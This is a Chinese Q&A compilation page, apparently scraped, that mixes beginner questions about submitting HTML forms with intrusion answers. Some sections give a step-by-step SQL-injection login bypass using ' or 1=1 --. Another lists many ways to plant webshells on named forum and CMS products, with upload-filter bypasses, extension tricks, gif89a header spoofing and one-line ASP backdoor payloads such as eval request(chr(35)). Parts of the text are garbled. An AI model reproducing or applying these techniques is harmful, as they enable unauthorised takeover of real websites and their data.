本文目录一览:
- 1、如何学习入侵网站?
- 2、如何把网页上form表单上的数据提交到后台的数据库呢
- 3、织梦后台自定义表单全是无效表单是怎么回事?是网站被入侵了吗
- 4、asp网站后台入侵
- 5、如何进入网站后台 获取webshell进入后台
- 6、html网站表单内容怎么提交到后台?因为是新手,所以不懂。希望得到帮助
如何学习入侵网站?
打开你要入侵的网站。在表单中任意提交错误的用户名/密码。(比如用户名:我,密码:' or 1=1 --)。这时对话框会跳出来提示用户名密码错误。从这里开始你要亲自动手了。
右键点击错误页面的任意位置,选择查看源代码。
这时你可以查看到HTML代码和JavaScript代码。找到一些类似_form action="...Login...."的代码。在登录代码前面,找到你现在所在的页面URL,然後复制下来。
然後删除服务器上验证你登录信息的JavaScript代码。(做这一步要小心,你是否能成功入侵此网站取决於你能否删除这个验证你账户信息的JavaScript代码。)
然後仔细查看找到代码_input name="password" type="password" - 用代码 "_type=text 「替换掉"_type=password"。 如果那儿限制的密码字符长度小於11,就改成11。
然後文件另存为到电脑的任意位置,文件後缀为.html。比如文件名chan.html到c盤。
双击打开刚保存在电脑上的的文件chan.html。你会看到与源文件相比有所不同。不要担心。
提交任意用户名(比如:hacker)和密码(比如:' or 1=1 --)。这时就会成功入侵了刚才那个网站并且成功进入到网站服务器上数据库里存放的账户。
如何把网页上form表单上的数据提交到后台的数据库呢
form ruant="sever"
但是你下面的botton是input标签,表示客户端控件,如果想提交必须要通过Ajax,否则就必须把botton改成服务器端控件
织梦后台自定义表单全是无效表单是怎么回事?是网站被入侵了吗
不是网站被入侵,是有软件攻击,经常会碰到,在提交表单处加一个验证码会要好一些
asp网站后台入侵
常用的有两个 *** 一,猜测常用帐号名,密码,网站相关名称信息 *** *** 等,2构建网站参数获取表,行暴暴力攻击工具,在百度一搜就一堆,如果站点做了防止站外提交表单,还要用伪造IP地址的小工具;还不行的话就不要浪费时间了;另外如果站点没有做防sql注入,这个 *** 也不错,还有就是看网站集成了那些常用的模板,有的有漏洞,如文件上传等等
如何进入网站后台 获取webshell进入后台
一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell *** 是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!
三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一 *** 是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用"""":""//"等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//",还有一种 *** 就是写上cnhacker at 263 dot net"%%eval request(chr(35))%%',这样就会形成前后对应,最小马也就运行了。%eval request(chr(35))%可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马"%%execute request("l")%%',保存顶部栏目菜单参数设置成功后,我们就得到马地址http://网站/admin/rootclass_menu_config.asp。
五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此 *** 来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的 *** ,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。
六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上%eval request (chr(35))%, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单
html网站表单内容怎么提交到后台?因为是新手,所以不懂。希望得到帮助
首先你需要一个提交按钮
可以生成button 然后button上写一个onclick事件,事件触发通过一个函数 执行这个函数指向你要提交的页面, 或者生成一个提交按钮,提交触发onsubmit ,onsubmit 指向action.
from action="1.html(提交的位置,可以是.jsp)" onsubmit="return true" method ="post"(拿到表单选中的内容)
input type="submit" value="提交"\
/from
第二种好点